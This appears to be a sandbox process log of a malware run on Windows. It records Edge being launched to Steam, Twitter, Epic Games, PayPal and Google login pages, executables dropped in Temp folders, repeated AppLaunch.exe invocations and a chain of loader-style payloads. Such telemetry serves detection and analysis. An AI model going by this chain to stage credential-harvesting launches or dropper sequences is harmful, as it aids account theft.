C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x178,0x17c,0x180,0x154,0x184,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x174,0x178,0x17c,0x150,0x180,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2ne4059.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2ne4059.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,12282619515920077255,18350766789350249296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,3047211895264663266,15721604572363523781,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,9635004217065434973,11661739386978840583,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,3047211895264663266,15721604572363523781,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,7299178135159070975,8079948826552501164,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3048 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3040 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,13319299788781063699,14241595865526302181,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,13319299788781063699,14241595865526302181,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,1277284653793961071,16103096436263094128,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,1277284653793961071,16103096436263094128,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,9603333117890698905,11035407571429318320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,9603333117890698905,11035407571429318320,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1920 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,12282619515920077255,18350766789350249296,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,10190492166486849531,17931315916109552050,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,10190492166486849531,17931315916109552050,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,7299178135159070975,8079948826552501164,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3092 /prefetch:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,4825615854534674189,8882673237632103932,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,9635004217065434973,11661739386978840583,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4596 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6900 -ip 6900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8iC574jv.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8iC574jv.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4372 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9Ei0mD5.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9Ei0mD5.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8024 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8000 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4380 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4380 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\CF70.exe

C:\Users\Admin\AppData\Local\Temp\CF70.exe

C:\Users\Admin\AppData\Local\Temp\EDC.exe

C:\Users\Admin\AppData\Local\Temp\EDC.exe

C:\Users\Admin\AppData\Local\Temp\1229.exe

C:\Users\Admin\AppData\Local\Temp\1229.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

